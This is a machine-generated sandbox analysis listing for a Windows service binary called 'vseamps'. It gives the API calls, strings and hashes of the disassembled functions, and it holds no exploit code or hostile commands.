                                                    • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                                    • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                                    • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                                    • String ID:
                                                    • API String ID: 2707001247-0
                                                    • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                    • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                                    • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                                    • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 849930591-393685449
                                                    • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                    • Instruction ID: 7c1df3a0dcb362c68ddf5089fb43d0b1cd7a76e8c0484346af7174e4e129ebd2
                                                    • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                                    • Instruction Fuzzy Hash: E8D17F22B097498AEB209B7594603AD77A0FF56F98F100275EE8D57BA6CF38E581C704
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                    • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                                    • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                                    • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                    • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                                    • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                                    • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeLibraryProc
                                                    • String ID: api-ms-$ext-ms-
                                                    • API String ID: 3013587201-537541572
                                                    • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                    • Instruction ID: 081debef2622172ccf7f302983589d2187042ea445c2556ce8c76394e5287faf
                                                    • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                                    • Instruction Fuzzy Hash: 1041E421B1BA1A41EA16CB36A8307BE2391BF07F90F584675DD0E4779AEF3CE4458308
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                                    • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                    • API String ID: 1119674940-1966266597
                                                    • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                    • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                                    • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                                    • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$AllocProcesslstrlen$ComputerName
                                                    • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                    • API String ID: 3702919091-996641649
                                                    • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                    • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
                                                    • Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                                    • Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00
                                                    APIs
                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$Info
                                                    • String ID:
                                                    • API String ID: 1775632426-0
                                                    • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                    • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                    • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                    • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA58071B1
                                                    • GetLastError.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA58071BF
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA58071E9
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA5807257
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFDA58072EB,?,?,?,00007FFDA5803EC0,?,?,?,?,00007FFDA5803CFD), ref: 00007FFDA5807263
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProc
                                                    • String ID: api-ms-
                                                    • API String ID: 2559590344-2084034818
                                                    • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                    • Instruction ID: cbd2ee8333d022ba9ca69cfc978033c7dc408b5fdfb00161c87cbd75f9d2c686
                                                    • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                    • Instruction Fuzzy Hash: 7531D221B1B64A91FE169B22A4207B92394BF4AF61F590774ED1F87392EF3CE4418308
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                    • Instruction ID: c1478fb23d69b8489b4d3f6950874c6254d5f5f99169266818a394e59ed500db
                                                    • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                    • Instruction Fuzzy Hash: DA215E60B0FA9A46FA94B331557133D5242AF46FB0F1407B4E93E07BDBEE2CA8418708
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2718029587.00007FFDA5801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA5800000, based on PE: true
                                                    • Associated: 00000005.00000002.2718015128.00007FFDA5800000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718047421.00007FFDA5812000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718062925.00007FFDA581D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000005.00000002.2718076682.00007FFDA581F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_7ffda5800000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                    • String ID: CONOUT$
                                                    • API String ID: 3230265001-3130406586
                                                    • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                    • Instruction ID: 6ed119960da3c14ab0f8d033e0277459b014c5dbed9ec3107c1c85845cb49465
                                                    • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                    • Instruction Fuzzy Hash: F6118E21B19A45C2E7508B72E86432973A0FB8AFE4F044274EA5F87BD5CF3CD5448748
                                                    APIs
                                                    • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                    • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                      • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                      • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                      • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                      • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                      • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                      • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                      • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                      • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                      • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                      • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                      • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                    • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                    • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                      • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                      • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                      • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                      • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                      • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                      • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                      • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                      • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                      • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                      • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                      • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                    • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                    • String ID: vseamps
                                                    • API String ID: 3197017603-3944098904
                                                    • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                    • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                    • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                    • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Messagesprintf_s
                                                    • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                    • API String ID: 2642950106-3610746849
                                                    • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                    • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                    • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                    • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                    • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                    • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                    • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                    • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                    • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                    • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.2717878919.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000005.00000002.2717863299.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717936981.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717951596.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000005.00000002.2717964940.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_140000000_7tqorj.jbxd
                                                    Similarity
                                                    • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 319667368-0
                                                    • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                    • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                    • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                    • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                    APIs
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                    • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                      • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                    • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                    • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
